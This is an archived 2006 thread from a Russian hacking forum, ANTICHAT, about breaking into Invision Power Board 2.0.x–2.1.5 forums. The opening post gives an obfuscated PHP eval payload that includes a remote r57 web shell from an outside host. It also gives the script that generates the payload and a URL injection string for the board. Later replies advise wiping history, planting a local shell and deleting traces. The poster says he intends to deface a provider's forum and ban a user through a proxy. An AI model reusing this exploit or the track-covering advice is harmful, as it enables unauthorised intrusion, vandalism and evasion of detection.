ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
08.07.2006, 14:49
|
|
Участник форума
Регистрация: 03.07.2006
Сообщений: 110
Провел на форуме:
258848
Репутация:
27
|
|
Вопросик по шеллу
Вот шелл для ипб 2.0.х - 2.1.5.
Код:
eval( chr(105). chr(110). chr(99). chr(108). chr(117). chr(100). chr(101). chr(32). chr(34). chr(104). chr(116). chr(116). chr(112). chr(58). chr(47). chr(47). chr(114). chr(115). chr(116). chr(46). chr(118). chr(111). chr(105). chr(100). chr(46). chr(114). chr(117). chr(47). chr(100). chr(111). chr(119). chr(110). chr(108). chr(111). chr(97). chr(100). chr(47). chr(114). chr(53). chr(55). chr(115). chr(104). chr(101). chr(108). chr(108). chr(46). chr(116). chr(120). chr(116). chr(34). chr(59). chr(47). chr(42). chr(32) ); //
Значиццо выглядит это так :
Код:
<?php $str="include \"http://rst.void.ru/download/r57shell.txt\";/*";// */ echo "eval( "; for($i=0;$i<strlen($str);$i++) { echo "chr(".ord($str[$i])."). "; } echo "chr(".ord(" ").") ); //"; ?>
Тут созревает вопрос : шелл заливается через создание темы, поиск темы, и добавки кода вызова шелла :
Код:
&lastdate=z|eval.*?%20//)%23e%00
Тоесть, если я сменю состав сообщения, вместо кода я впишу 123 и код вытру - то шелл не будет присутствовать не серве, тем самым следы можно замести? Я так понимаю хак работает через внешний шелл и не подгружает его в сам форум. |
|
|
08.07.2006, 14:55
|
|
Banned
Регистрация: 06.06.2006
Сообщений: 944
Провел на форуме:
3986705
Репутация:
1403
|
|
Сообщение от Sulf aka Joker
то шелл не будет присутствовать не серве, тем самым следы можно замести?
Следы можно замести только почистив хистори...
|
|
|
|
08.07.2006, 14:57
|
|
Познающий
Регистрация: 02.06.2006
Сообщений: 66
Провел на форуме:
870911
Репутация:
69
|
|
Мля ну ты дал. Include есть Include.
Конечно
... не подгружает его в сам форум.
|
|
|
|
08.07.2006, 14:57
|
|
Участник форума
Регистрация: 03.07.2006
Сообщений: 110
Провел на форуме:
258848
Репутация:
27
|
|
Я имею ввиду - то что в админке будет виден заход другого админа это да, но например администрация серва - она как догадается что форум открыли именно через этот шелл?
|
|
|
|
08.07.2006, 15:00
|
|
Познающий
Регистрация: 02.06.2006
Сообщений: 66
Провел на форуме:
870911
Репутация:
69
|
|
|
|
|
|
08.07.2006, 15:02
|
|
Участник форума
Регистрация: 03.07.2006
Сообщений: 110
Провел на форуме:
258848
Репутация:
27
|
|
Всмысле проникли в админку ну и так далее - по выбору. Будет видно что новый админ появился, и всё, верно? То что именно р57 шелл юзали, не будет видно?
|
|
|
|
08.07.2006, 15:02
|
|
Заведующий всем
Регистрация: 17.04.2005
Сообщений: 1,062
Провел на форуме:
5957900
Репутация:
561
|
|
Ну да, находится на rst, а выполняется на жертве.
Просто залей через него локальный шелл и потри сообщение.
|
|
|
|
08.07.2006, 15:05
|
|
Участник форума
Регистрация: 03.07.2006
Сообщений: 110
Провел на форуме:
258848
Репутация:
27
|
|
Я просто хочу на одном форуме провайдера, вытереить один раздел форум и забанить 1 юзера, ну не хочу чтоб меня запалили под этим делом. Под прокси всё буду делать, потом тему с кодом шелла вытру полностью. Так не запалят?
|
|
|
|
08.07.2006, 15:06
|
|
Banned
Регистрация: 06.06.2006
Сообщений: 944
Провел на форуме:
3986705
Репутация:
1403
|
|
И хистори сотри....
|
|
|
|
08.07.2006, 15:07
|
|
Участник форума
Регистрация: 03.07.2006
Сообщений: 110
Провел на форуме:
258848
Репутация:
27
|
|
А хистори - в админке типо?
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
